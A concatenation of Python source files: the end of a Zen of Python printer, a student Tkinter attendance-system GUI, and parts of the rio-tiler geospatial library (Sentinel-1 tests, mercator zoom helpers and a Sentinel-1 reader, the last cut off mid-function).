"Explicit is better than implicit.",
"Simple is better than complex.",
"Complex is better than complicated.",
"Flat is better than nested.",
"Sparse is better than dense.",
"Readability counts.",
"Special cases aren't special enough to break the rules.",
"Although practicality beats purity.",
"Errors should never pass silently.",
"Unless explicitly silenced.",
"In the face of ambiguity, refuse the temptation to guess.",
"There should be one-- and preferably only one --obvious way to do it.",
"Although that way may not be obvious at first unless you're Dutch.",
"Now is better than never.",
"Although never is often better than *right* now.",
"If the implementation is hard to explain, it's a bad idea.",
"If the implementation is easy to explain, it may be a good idea.",
"Namespaces are one honking great idea -- let's do more of those!" ]
def _to_lines(list_of_strings):
return newline.join(list_of_strings)
def zen():
"""
Prints the original Zen of Python by <NAME>
"""
print _header + _to_lines(_aphorisms)
def numbered_zen():
"""
Prints the Zen of Python, numbering each aphorism
"""
print _header + \
_to_lines(['%d. %s' % (n, apho) for n, apho in enumerate(_aphorisms, 1)])
def aphorism(index):
"""
Prints the aphorism that you want
:param index: the reference number of the aphorism
:type index: int
"""
print _aphorisms[index+1]
def apropos(list_of_terms):
"""
Prints the aphorisms that include at least one of the provided keywords.
String matchings are exact and key insensitive
:param list_of_terms: a list of keywords
:type list_of_terms: list
"""
matching_aphorisms = set()
for aphorism in _aphorisms:
for term in list_of_terms:
if term.lower() in aphorism.lower():
matching_aphorisms.add(aphorism)
if matching_aphorisms:
print _to_lines(list(matching_aphorisms))
def random():
"""
Prints a random aphorism
"""
print _aphorisms[randrange(0,len(_aphorisms)-1)]
# May the Zen be with you...
zen()
|
Error1996/Attendance-System
|
Attendance/attendance_v2.py
|
import tkinter
from tkinter import ttk
from PIL import ImageTk, Image, ImageFilter
from tkinter import messagebox
from tkinter import tix
import random
import threading
import time
from Data import teachers
class Login:
def __init__(self):
path = 'Source/unnamed.jpg'
image_old = Image.open(path)
#image_old = image_old.filter(ImageFilter.BLUR)
image = image_old.resize((app.winfo_screenwidth(), app.winfo_screenheight()), Image.ANTIALIAS)
image = ImageTk.PhotoImage(image)
self.t = ttk.Label(app, image=image).grid(rowspan=10, columnspan=10)
self.image = image
def rem(self, e, widget):
widget.delete(0, tkinter.END)
def f_pas(self, e):
text = self.pas['text']
if text == 'Show':
self.e_pass.configure(show='')
self.pas.configure(text='Hide')
else:
self.e_pass.configure(show='\u2022')
self.pas.configure(text='Show')
def enter_con(self, e, widget):
widget.configure(foreground='red')
if widget['text'] == 'Forgot Password':
widget.configure(font=('', 9, 'normal', 'roman', 'underline'))
def leave_con(self, e, widget):
widget.configure(foreground='black')
if widget['text'] == 'Forgot Password':
widget.configure(font=('', 9, 'normal', 'roman'))
def log_check(self, f1):
data = teachers.log()
hod = 0
if not data == []:
for _ in data:
if self.e_user.get() == _[0]:
hod = _[0]
if self.e_pass.get() == _[1]:
flag_log = 2
break
else:
flag_log = 1
break
else:
flag_log = 0
if flag_log is 2:
f1.destroy()
m = messagebox.showinfo('Success', 'Logged in successfully !!!')
if m:
self.a = Attend(hod)
elif flag_log is 1:
messagebox.showwarning('Warning', 'Incorrect Password !!!')
else:
messagebox.showwarning('Warning', 'Incorrect User Name !!!')
else:
if self.e_user.get() == 'Shubham':
if self.e_pass.get() == 'Error':
pass
else:
messagebox.showerror('Error', 'Wrong Administrator Password !!!')
else:
messagebox.showerror('Error', 'Wrong Administrator Name !!!')
def log(self, n1=None):
try:
self.a.n1.destroy()
except:
pass
f1 = ttk.Labelframe(app, text='Login', style='TLabelframe')
f1.grid(row=2, column=3, ipadx=50, rowspan=5, columnspan=4)
ttk.Label(f1, text='User Name', font=('times', 20)).pack(pady=10)
self.e_user = ttk.Entry(f1, width=25, font=('times', 20))
self.e_user.pack(pady=10)
self.e_user.bind('<Button-1>', lambda e, widget=self.e_user: self.rem(e, widget))
ttk.Label(f1, text='Password', font=('times', 20)).pack(pady=10)
self.e_pass = ttk.Entry(f1, width=25, font=('times', 20), show='\u2022')
self.e_pass.pack(pady=10)
self.e_pass.bind('<Button-1>', lambda e, widget=self.e_pass: self.rem(e, widget))
self.pas = ttk.Label(f1, cursor='hand2')
self.pas.configure(text='Show')
self.pas.bind('<Button-1>', self.f_pas)
self.pas.bind('<Enter>', lambda e, widget=self.pas: self.enter_con(e, widget))
self.pas.bind('<Leave>', lambda e, widget=self.pas: self.leave_con(e, widget))
self.pas.pack(anchor='e', padx=50)
forgot = tkinter.Label(f1, text='Forgot Password', font=('', 9, 'normal', 'roman'), cursor='hand2')
forgot.bind('<Enter>', lambda e, widget=forgot: self.enter_con(e, widget))
forgot.bind('<Leave>', lambda e, widget=forgot: self.leave_con(e, widget))
forgot.pack()
ttk.Button(f1, text='Submit', cursor='hand2', command=lambda: self.log_check(f1)).pack(pady=10)
class Attend:
def __init__(self, user):
self.user = user
self.n1 = ttk.Notebook(app, width=1200, height=600)
self.f1 = ttk.Frame(self.n1)
self.n1.add(self.f1, text=' Daily Record ')
self.f2 = ttk.Frame(self.n1)
self.n1.add(self.f2, text=' Monthly Record ')
self.f3 = ttk.Frame(self.n1)
self.n1.add(self.f3, text=' Settings ')
self.n1.grid(row=2, column=3)
threading.Thread(target=self.daily_rec).start()
threading.Thread(target=self.mon_rec).start()
threading.Thread(target=self.settings).start()
#state_1.Attend2(self.f1)
def daily_rec(self):
def cal(c):
import sys
import calendar
root = tkinter.Toplevel()
root.title('Ttk Calendar')
root.grab_set()
w = c.winfo_reqheight()
h = c.winfo_reqheight()
print(w, h)
root.geometry('+%d+%d' % (w, h))
tkinter.Label(root, text='NEW').pack()
root.mainloop()
def check():
for e, i in enumerate(v1):
if i.get() == 1:
for j in v2[e]:
j.set(1)
else:
for j in v2[e]:
j.set(0)
def cur_enter(ev, t1, t2, t3, t4):
t1.config(fg='red')
t2.config(fg='red')
t4.config(fg='red')
t3.config(foreground='red')
def cur_leave(ev, t1, t2, t3, t4):
t1.config(fg='black')
t2.config(fg='black')
t4.config(fg='black')
t3.config(foreground='black')
def log_out():
m = messagebox.askyesno('Alert', 'Do you want to Log Out ?')
if m:
l.log(self.n1)
frame = tkinter.Frame(self.f1)
frame.pack(pady=20, fill='x', expand=True)
back = ttk.Button(frame, text='<- Log Out', command=log_out)
back.grid(padx=20)
f = ttk.Frame(frame)
f.grid(row=0, column=1, padx=400)
ttk.Label(f, text='Date : ', font=(14)).grid(row=0, column=0)
e = ttk.Entry(f, font=(14), width=9)
e.grid(row=0, column=1)
e.insert(0, time.strftime('%d/%m/%Y'))
#e.config(state='disable')
'''c = ttk.Button(f, text='Calender')
c.config(command=lambda c=c: cal(c))
c.grid(row=0, column=2, padx=5)'''
submit = ttk.Button(f, text="Submit ->")
submit.grid(row=0, column=3, padx=435)
data = teachers.lec()
if data is []:
for _ in data:
if _[0] == self.user:
c = _[1].split(',')
c.sort()
break
else:
pass
else:
c = ["CSE", "ECE", "ELECTRICAL", "CIVIL", "MECHANICAL"]
c.sort()
n2 = ttk.Notebook(self.f1, width=1200, height=600)
n2.pack(fill='both', expand=True)
v1 = []
v2 = []
for i in range(0, len(c)):
f = ttk.Frame(n2)
n2.add(f, text=' '+c[i]+' ')
canvas1 = tkinter.Canvas(f)
scrolly = tix.Scrollbar(f, command=canvas1.yview, orient='vertical')
canvas1.pack(side='left', fill='both', expand=True)
scrolly.pack(side='right', fill='y')
f2 = tkinter.Frame(canvas1, width=1100, height=550)
ttk.Label(f2, text='S.No.', font=('times', 14)).grid(row=0, column=0, padx=80, pady=20)
ttk.Label(f2, text='Roll No.', font=('times', 14)).grid(row=0, column=1, padx=80, pady=20)
ttk.Label(f2, text='Name', font=('times', 14)).grid(row=0, column=2, padx=80, pady=20)
ttk.Label(f2, text='Total Attended', font=('times', 14)).grid(row=0, column=4, padx=80, pady=20)
'''e = tix.Entry(f2)
e.insert(0, '01/01/2018')
e.grid(row=0, column=3, padx=80, pady=20)'''
v11 = tkinter.Variable()
v11.set(0)
v1.append(v11)
v21 = []
v2.append(v21)
for j in range(0, 50):
v21.append(tkinter.Variable())
v21[j].set(0)
t1 = tkinter.Label(f2, text=j+1, font=('helvatica', 12))
t1.grid(row=j+3, column=0, padx=20)
t2 = tkinter.Label(f2, text='181'+str(j), font=('helvatica', 12))
t2.grid(row=j+3, column=1, padx=70)
t3 = ttk.Label(f2, text='Student-'+str(j+1), font=('helvatica', 12), wraplength=100)
t3.grid(row=j+3, column=2, columnspan=2, padx=70)
t4 = tkinter.Label(f2, text=str(random.randrange(10))+'/10', font=('helvatica', 12))
t4.grid(row=j+3, column=4)
t5 = tix.Checkbutton(f2, onvalue=1, offvalue=0, variable=v21[j], font=('helvatica', 20))
t5.grid(row=j+3, column=5, padx=70)
t1.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_enter(ev, t1, t2, t3, t4))
t2.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_enter(ev, t1, t2, t3, t4))
t3.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_enter(ev, t1, t2, t3, t4))
t4.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_enter(ev, t1, t2, t3, t4))
t5.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_enter(ev, t1, t2, t3, t4))
t1.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_leave(ev, t1, t2, t3, t4))
t2.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_leave(ev, t1, t2, t3, t4))
t3.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_leave(ev, t1, t2, t3, t4))
t4.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_leave(ev, t1, t2, t3, t4))
t5.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4: cur_leave(ev, t1, t2, t3, t4))
'''for k in range(3, 200):
tix.Label(f2, text=k).grid(row=1, column=k)'''
tix.Checkbutton(f2, text='All', onvalue=1, offvalue=0, variable=v11, command=check).grid(row=0, column=5)
canvas1.create_window(0, 0, window=f2)
f2.update_idletasks()
canvas1.itemconfigure("frame")
canvas1.config(scrollregion=canvas1.bbox("all"))
canvas1.config(yscrollcommand=scrolly.set)
def mon_rec(self):
def bind_x(*args):
f.update_idletasks()
canvas1.xview(*args)
canvas2.xview(*args)
def OnMouseWheel(event):
canvas2.yview_scroll(int(-1*(event.delta/120)), "units")
return "break"
def cur_enter(ev, t1, t2, t3, t4, t5):
t1.config(fg='red')
t2.config(fg='red')
t3.config(foreground='red')
t4.config(fg='red')
for i in range(len(t5)):
t5[i].config(fg='red')
def cur_leave(ev, t1, t2, t3, t4, t5):
t1.config(fg='black')
t2.config(fg='black')
t3.config(foreground='black')
t4.config(fg='black')
for i in range(len(t5)):
t5[i].config(fg='black')
data = teachers.lec()
if data is []:
for _ in data:
if _[0] == self.user:
c = _[1].split(',')
c.sort()
break
else:
pass
else:
c = ["CSE", "ECE", "ELECTRICAL", "CIVIL", "MECHANICAL"]
c.sort()
n2 = ttk.Notebook(self.f2)
n2.pack(fill='both', expand=True)
for i in range(0, len(c)):
f = ttk.Frame(n2, width=1150, height=10)
n2.add(f, text=' '+c[i]+' ')
frame1 = ttk.Frame(f)
frame1.pack(side='top', fill='x')
frame2 = ttk.Frame(f)
frame2.pack(fill='both', expand=True)
canvas1 = tkinter.Canvas(frame1, height=40)
canvas2 = tkinter.Canvas(frame2)
scrolly = tix.Scrollbar(frame2, command=canvas2.yview, orient='vertical')
scrollx = tix.Scrollbar(f, command=bind_x, orient='horizontal')
scrolly.pack(side='right', fill='y')
scrollx.pack(side='bottom', fill='x')
canvas1.pack(side='top', fill='x', expand=True)
canvas2.pack(side='left', fill='both', expand=True)
f.bind_all("<MouseWheel>", OnMouseWheel)
f1 = tkinter.Frame(canvas1)
f2 = tkinter.Frame(canvas2)
ttk.Label(f1, text='S.No.', font=('times', 14)).grid(row=0, column=0, padx=30)
ttk.Label(f1, text='Roll No.', font=('times', 14)).grid(row=0, column=1, padx=33)
ttk.Label(f1, text='Name', font=('times', 14)).grid(row=0, column=2, padx=54)
for j in range(0, 10):
ttk.Label(f1, text=j+1, font=('times', 14)).grid(row=0, column=4+j, padx=4)
for j in range(10, 30):
ttk.Label(f1, text=j+1, font=('times', 14)).grid(row=0, column=4+j, padx=1)
ttk.Label(f1, text='Total', font=('times', 14)).grid(row=0, column=j+5, padx=10)
'''e = tix.Entry(f2)
e.insert(0, '01/01/2018')
e.grid(row=0, column=3, padx=80, pady=20)'''
for j in range(0, 50):
t1 = tkinter.Label(f2, text=j+1, font=('helvatica', 12))
t1.grid(row=j+3, column=0, padx=40)
t2 = tkinter.Label(f2, text='181'+str(j), font=('helvatica', 12))
t2.grid(row=j+3, column=1, padx=40)
t3 = ttk.Label(f2, text='Student-'+str(j+1), font=('helvatica', 12), wraplength=100)
t3.grid(row=j+3, column=2, columnspan=2, padx=40)
t4 = tkinter.Label(f2, text=' '+str(random.randrange(10))+'/10 ', font=('helvatica', 12))
t4.grid(row=j+3, column=35)
t5 = []
for k in range(0, 10):
t = tkinter.Label(f2, text=str(random.choice(['A', 'P'])), font=('helvatica', 12))
t.grid(row=j+3, column=k+4, padx=2, sticky='W')
t5.append(t)
t.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_enter(ev, t1, t2, t3, t4, t5))
t.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_leave(ev, t1, t2, t3, t4, t5))
tkinter.Label(f2).grid(row=j+3, column=k+5)
for k in range(11, 21):
t = tkinter.Label(f2, text=str(random.choice(['A', 'P'])), font=('helvatica', 12))
t.grid(row=j+3, column=k+4, padx=4, sticky='W')
t5.append(t)
t.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_enter(ev, t1, t2, t3, t4, t5))
t.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_leave(ev, t1, t2, t3, t4, t5))
for k in range(21, 31):
t = tkinter.Label(f2, text=str(random.choice(['A', 'P'])), font=('helvatica', 12))
t.grid(row=j+3, column=k+4, padx=3, sticky='W')
t5.append(t)
t.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_enter(ev, t1, t2, t3, t4, t5))
t.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_leave(ev, t1, t2, t3, t4, t5))
t1.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_enter(ev, t1, t2, t3, t4, t5))
t2.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_enter(ev, t1, t2, t3, t4, t5))
t3.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_enter(ev, t1, t2, t3, t4, t5))
t4.bind('<Enter>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_enter(ev, t1, t2, t3, t4, t5))
t1.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_leave(ev, t1, t2, t3, t4, t5))
t2.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_leave(ev, t1, t2, t3, t4, t5))
t3.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_leave(ev, t1, t2, t3, t4, t5))
t4.bind('<Leave>', lambda ev, t1=t1, t2=t2, t3=t3, t4=t4, t5=t5: cur_leave(ev, t1, t2, t3, t4, t5))
'''for k in range(3, 200):
tix.Label(f2, text=k).grid(row=1, column=k)'''
canvas1.create_window(0, 0, window=f1)
canvas2.create_window(0, 0, window=f2)
f1.update_idletasks()
canvas1.itemconfigure("frame")
f2.update_idletasks()
canvas2.itemconfigure("frame")
canvas1.config(scrollregion=canvas1.bbox("all"))
canvas1.config(xscrollcommand=scrollx.set)
canvas2.config(scrollregion=canvas2.bbox("all"))
canvas2.config(yscrollcommand=scrolly.set)
canvas2.config(xscrollcommand=scrollx.set)
def settings(self):
def color1():
c1.config(fg='blue')
c1.after(500, color2)
def color2():
c1.config(fg='red')
c1.after(500, color3)
def color3():
c1.config(fg='green')
c1.after(500, color1)
n2 = ttk.Notebook(self.f3)
'''f1 = ttk.Frame(n2)
n2.add(f1, text=' Add a Student ')
f2 = ttk.Frame(n2)
n2.add(f2, text=' Remove a Student ')'''
n2.pack()
c1 = tkinter.Label(n2, text='Code Is In Construction !!!', font=('', 40))
c1.config(fg='red')
c1.pack()
c1.after(1000, color1)
if __name__ == '__main__':
app = tkinter.Tk()
app.title('Attendance System')
#app.geometry('1280x800')
app.wm_state('zoomed')
#app.configure(background='#008B8B')
s = ttk.Style()
s.configure('TLabelframe.Label', font=('times', 20))
s.configure('TNotebook', tabposition='n')
s.configure('TNotebook.Tab', font=('times', 16), padding=(10, 10, 10, 10))
#s.configure('TLabelframe', background='#008B8B')
l = Login()
l.log()
app.mainloop()
|
mvmendes/rio-tiler
|
tests/test_io_sentinel1.py
|
<filename>tests/test_io_sentinel1.py
"""tests rio_tiler.io.sentinel1"""
import os
from io import BytesIO
import pytest
import rasterio
from mock import patch
from rio_tiler.errors import InvalidBandName, InvalidSentinelSceneId, TileOutsideBounds
from rio_tiler.io import sentinel1
SENTINEL_SCENE = "S1A_IW_GRDH_1SDV_20180716T004042_20180716T004107_022812_02792A_FD5B"
SENTINEL_BUCKET = os.path.join(os.path.dirname(__file__), "fixtures", "sentinel-s1-l1c")
with open(
"{}/GRD/2018/7/16/IW/DV/S1A_IW_GRDH_1SDV_20180716T004042_20180716T004107_022812_02792A_FD5B/productInfo.json".format(
SENTINEL_BUCKET
),
"r",
) as f:
SENTINEL_METADATA = f.read().encode("utf-8")
def mock_rasterio_open(asset):
"""Mock rasterio Open."""
assert asset.startswith("s3://sentinel-s1-l1c")
asset = asset.replace("s3://sentinel-s1-l1c", SENTINEL_BUCKET)
return rasterio.open(asset)
@pytest.fixture(autouse=True)
def testing_env_var(monkeypatch):
"""Set fake env to make sure we don't hit AWS services."""
monkeypatch.setenv("AWS_ACCESS_KEY_ID", "jqt")
monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "rde")
monkeypatch.delenv("AWS_PROFILE", raising=False)
monkeypatch.setenv("AWS_CONFIG_FILE", "/tmp/noconfigheere")
monkeypatch.setenv("AWS_SHARED_CREDENTIALS_FILE", "/tmp/noconfighereeither")
monkeypatch.setenv("GDAL_DISABLE_READDIR_ON_OPEN", "EMPTY_DIR")
@patch("rio_tiler.io.sentinel1.boto3_session")
def test_bounds_valid(session):
"""Should work as expected (get bounds)"""
session.return_value.client.return_value.get_object.return_value = {
"Body": BytesIO(SENTINEL_METADATA)
}
meta = sentinel1.bounds(SENTINEL_SCENE)
assert (
meta["sceneid"]
== "S1A_IW_GRDH_1SDV_20180716T004042_20180716T004107_022812_02792A_FD5B"
)
assert len(meta.get("bounds")) == 4
calls = session.return_value.client.return_value.get_object.call_args
assert calls[1]["Bucket"] == "sentinel-s1-l1c"
assert calls[1]["Key"].endswith("productInfo.json")
def test_parse_sceneid():
"""Test sentinel1._sentinel_parse_scene_id."""
meta = sentinel1.sentinel1_parser(SENTINEL_SCENE)
meta[
"key"
] = "GRD/2018/7/16/IW/DV/S1A_IW_GRDH_1SDV_20180716T004042_20180716T004107_022812_02792A_FD5B"
with pytest.raises(InvalidSentinelSceneId):
sentinel1.sentinel1_parser("S2A_tile_20170729_19UDP_0")
@patch("rio_tiler.io.sentinel1.rasterio")
def test_metadata(rio):
"""Test sentinel1.metadata."""
rio.open = mock_rasterio_open
meta = sentinel1.metadata(SENTINEL_SCENE, bands=("vv", "vh"))
assert meta["sceneid"] == SENTINEL_SCENE
assert len(meta["bounds"]) == 4
assert len(meta["statistics"].items()) == 2
assert meta["statistics"]["vv"]["min"] == 1
assert meta["statistics"]["vh"]["max"] == 507
meta = sentinel1.metadata(SENTINEL_SCENE, bands="vv")
assert len(meta["statistics"].items()) == 1
with pytest.raises(InvalidBandName):
sentinel1.metadata(SENTINEL_SCENE, bands=("nope", "vh"))
with pytest.raises(InvalidBandName):
sentinel1.metadata(SENTINEL_SCENE)
@patch("rio_tiler.io.sentinel1.rasterio")
def test_tile_valid_default(rio):
"""Test tile reading."""
rio.open = mock_rasterio_open
tile_z = 8
tile_x = 183
tile_y = 120
data, mask = sentinel1.tile(SENTINEL_SCENE, tile_x, tile_y, tile_z, bands="vv")
assert data.shape == (1, 256, 256)
assert mask.shape == (256, 256)
data, mask = sentinel1.tile(
SENTINEL_SCENE, tile_x, tile_y, tile_z, bands=("vv", "vh")
)
assert data.shape == (2, 256, 256)
assert mask.shape == (256, 256)
with pytest.raises(InvalidBandName):
sentinel1.tile(SENTINEL_SCENE, tile_x, tile_y, tile_z)
with pytest.raises(InvalidBandName):
sentinel1.tile(
SENTINEL_SCENE, tile_x, tile_y, tile_z, bands=("vv", "vh", "nope")
)
tile_z = 8
tile_x = 183
tile_y = 130
with pytest.raises(TileOutsideBounds):
sentinel1.tile(SENTINEL_SCENE, tile_x, tile_y, tile_z, bands=("vv"))
|
mvmendes/rio-tiler
|
rio_tiler/io/__init__.py
|
<filename>rio_tiler/io/__init__.py
"""rio-tiler.io"""
|
mvmendes/rio-tiler
|
rio_tiler/mercator.py
|
"""rio-tiler: mercator utility functions."""
import math
from typing import Tuple, Union
from rasterio.io import DatasetReader, DatasetWriter
from rasterio.vrt import WarpedVRT
from rasterio.warp import calculate_default_transform, transform_bounds
from rio_tiler import constants
def _meters_per_pixel(zoom: int, lat: float = 0.0, tilesize: int = 256) -> float:
"""
Return the pixel resolution for a given mercator tile zoom and lattitude.
Parameters
----------
zoom: int
Mercator zoom level
lat: float, optional
Latitude in decimal degree (default: 0)
tilesize: int, optional
Mercator tile size (default: 256).
Returns
-------
Pixel resolution in meters
"""
return (math.cos(lat * math.pi / 180.0) * 2 * math.pi * 6378137) / (
tilesize * 2 ** zoom
)
def zoom_for_pixelsize(pixel_size: float, max_z: int = 24, tilesize: int = 256) -> int:
"""
Get mercator zoom level corresponding to a pixel resolution.
Freely adapted from
https://github.com/OSGeo/gdal/blob/b0dfc591929ebdbccd8a0557510c5efdb893b852/gdal/swig/python/scripts/gdal2tiles.py#L294
Parameters
----------
pixel_size: float
Pixel size
max_z: int, optional (default: 24)
Max mercator zoom level allowed
tilesize: int, optional
Mercator tile size (default: 256).
Returns
-------
Mercator zoom level corresponding to the pixel resolution
"""
for z in range(max_z):
if pixel_size > _meters_per_pixel(z, 0, tilesize=tilesize):
return max(0, z - 1) # We don't want to scale up
return max_z - 1
def get_zooms(
src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT],
ensure_global_max_zoom: bool = False,
tilesize: int = 256,
) -> Tuple[int, int]:
"""
Calculate raster min/max mercator zoom level.
Parameters
----------
src_dst: rasterio.io.DatasetReader
Rasterio io.DatasetReader object
ensure_global_max_zoom: bool, optional
Apply latitude correction factor to ensure max_zoom equality for global
datasets covering different latitudes (default: False).
tilesize: int, optional
Mercator tile size (default: 256).
Returns
-------
min_zoom, max_zoom: Tuple
Min/Max Mercator zoom levels.
"""
bounds = transform_bounds(
src_dst.crs, constants.WGS84_CRS, *src_dst.bounds, densify_pts=21
)
center = [(bounds[0] + bounds[2]) / 2, (bounds[1] + bounds[3]) / 2]
lat = center[1] if ensure_global_max_zoom else 0
dst_affine, w, h = calculate_default_transform(
src_dst.crs,
constants.WEB_MERCATOR_CRS,
src_dst.width,
src_dst.height,
*src_dst.bounds,
)
mercator_resolution = max(abs(dst_affine[0]), abs(dst_affine[4]))
# Correction factor for web-mercator projection latitude scale change
latitude_correction_factor = math.cos(math.radians(lat))
adjusted_resolution = mercator_resolution * latitude_correction_factor
max_zoom = zoom_for_pixelsize(adjusted_resolution, tilesize=tilesize)
ovr_resolution = adjusted_resolution * max(h, w) / tilesize
min_zoom = zoom_for_pixelsize(ovr_resolution, tilesize=tilesize)
return (min_zoom, max_zoom)
|
mvmendes/rio-tiler
|
rio_tiler/io/sentinel1.py
|
<filename>rio_tiler/io/sentinel1.py
"""rio_tiler.io.sentinel1: Sentinel-1 processing."""
import json
import os
import re
from concurrent import futures
from typing import Any, Dict, Sequence, Tuple, Union
import numpy
import rasterio
from boto3.session import Session as boto3_session
from rasterio import transform
from rasterio.vrt import WarpedVRT
from rio_tiler import constants, reader
from rio_tiler.errors import InvalidBandName, InvalidSentinelSceneId
REGION = os.environ.get("AWS_REGION", "eu-central-1")
SENTINEL_BANDS = ["vv", "vh"]
def _aws_get_object(
bucket: str,
key: str,
request_pays: bool = True,
client: boto3_session.client = None,
) -> bytes:
"""AWS s3 get object content."""
if not client:
session = boto3_session(region_name=REGION)
client = session.client("s3")
params = {"Bucket": bucket, "Key": key}
if request_pays:
params["RequestPayer"] = "requester"
response = client.get_object(**params)
return response["Body"].read()
def sentinel1_parser(sceneid: str) -> Dict:
"""
Parse Sentinel-1 scene id.
Attributes
----------
sceneid : str
Sentinel-1 sceneid.
Returns
-------
out : dict
dictionary with metadata constructed from the sceneid.
"""
if not re.match(
"^S1[AB]_(IW)|(EW)_[A-Z]{3}[FHM]_[0-9][SA][A-Z]{2}_[0-9]{8}T[0-9]{6}_[0-9]{8}T[0-9]{6}_[0-9A-Z]{6}_[0-9A-Z]{6}_[0-9A-Z]{4}$",
sceneid,
):
raise InvalidSentinelSceneId("Could not match {}".format(sceneid))
sentinel_pattern = (
r"^S"
r"(?P<sensor>\w{1})"
r"(?P<satellite>[AB]{1})"
r"_"
r"(?P<beam>[A-Z]{2})"
r"_"
r"(?P<product>[A-Z]{3})"
r"(?P<resolution>[FHM])"
r"_"
r"(?P<processing_level>[0-9])"
r"(?P<product_class>[SA])"
r"(?P<polarisation>(SH)|(SV)|(DH)|(DV)|(HH)|(HV)|(VV)|(VH))"
r"_"
r"(?P<startDateTime>[0-9]{8}T[0-9]{6})"
r"_"
r"(?P<stopDateTime>[0-9]{8}T[0-9]{6})"
r"_"
r"(?P<absolute_orbit>[0-9]{6})"
r"_"
r"(?P<mission_task>[0-9A-Z]{6})"
r"_"
r"(?P<product_id>[0-9A-Z]{4})$"
)
meta: Dict[str, Any] = re.match(
sentinel_pattern, sceneid, re.IGNORECASE
).groupdict()
meta["scene"] = sceneid
year = meta["startDateTime"][0:4]
month = meta["startDateTime"][4:6].strip("0")
day = meta["startDateTime"][6:8].strip("0")
meta["scheme"] = "s3"
meta["bucket"] = "sentinel-s1-l1c"
meta["prefix"] = os.path.join(
meta["product"], year, month, day, meta["beam"], meta["polarisation"], sceneid
)
return meta
def _get_bounds(scene_info: Dict) -> Tuple[float, float, float, float]:
bucket, prefix = scene_info["bucket"], scene_info["prefix"]
product_info = json.loads(_aws_get_object(bucket, f"{prefix}/productInfo.json"))
xyz = list(zip(*product_info["footprint"]["coordinates"][0]))
return min(xyz[0]), min(xyz[1]), max(xyz[0]), max(xyz[1])
def bounds(sceneid: str) -> Dict:
"""
Retrieve image bounds.
Attributes
----------
sceneid : str
Sentinel-1 sceneid.
Returns
-------
out : dict
dictionary with image bounds.
"""
scene_params = sentinel1_parser(sceneid)
return dict(sceneid=sceneid, bounds=_get_bounds(scene_params))
def metadata(
sceneid: str,
pmin: float = 2.0,
pmax: float = 98.0,
bands: Union[Sequence[str], str] = None,
hist_options: Dict = {},
**kwargs,
) -> Dict:
"""
Retrieve image bounds and band statistics.
Attributes
----------
sceneid : str
Sentinel-1 sceneid.
pmin : float, optional, (default: 2.)
Histogram minimum cut.
pmax : float, optional, (default: 98.)
Histogram maximum cut.
bands: tuple, str, required
Bands name (e.g vv, vh).
kwargs : optional
These are passed to 'rio_tiler.utils._stats'
e.g: bins=20, range=(0, 1000)
Returns
-------
out : dict
Dictionary with image bounds and bands statistics.
"""
if not bands:
raise InvalidBandName("bands is required")
if isinstance(bands, str):
bands = (bands,)
for band in bands:
if band not in SENTINEL_BANDS:
raise InvalidBandName("{} is not a valid Sentinel band name".format(band))
scene_params = sentinel1_parser(sceneid)
sentinel_prefix = "{scheme}://{bucket}/{prefix}/measurement".format(**scene_params)
def worker(band: str):
asset = "{}/{}-{}.tiff".format(
sentinel_prefix, scene_params["beam"].lower(), band
)
with rasterio.open(asset) as src_dst:
with WarpedVRT(
src_dst,
src_crs=src_dst.gcps[1],
src_transform=transform.from_gcps(src_dst.gcps[0]),
src_nodata=0,
) as vrt_dst:
return reader.metadata(
vrt_dst,
percentiles=(pmin, pmax),
hist_options=hist_options,
**kwargs,
)
with futures.ThreadPoolExecutor(max_workers=constants.MAX_THREADS) as executor:
responses = list(executor.map(worker, bands))
info = dict(
sceneid=sceneid,
bounds=responses[0]["bounds"],
band_descriptions=[(ix + 1, b) for ix, b in enumerate(bands)],
)
info["statistics"] = {
b: v for b, d in zip(bands, responses) for _, v in d["statistics"].items()
}
return info
def tile(
sceneid: str,
tile_x: int,
tile_y: int,
tile_z: int,
bands: Union[Sequence[str], str] = None,
tilesize: int = 256,
**kwargs: Any,
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Create mercator tile from Sentinel-1 data.
Attributes
----------
sceneid : str
Sentinel-2 sceneid.
tile_x : int
Mercator tile X index.
tile_y : int
Mercator tile Y index.
tile_z : int
Mercator tile ZOOM level.
bands: tuple, str, required
Bands name (e.g vv, vh).
tilesize : int, optional (default: 256)
Output image size.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
if not bands:
raise InvalidBandName("bands is required")
if isinstance(bands, str):
bands = (bands,)
for band in bands:
if band not in SENTINEL_BANDS:
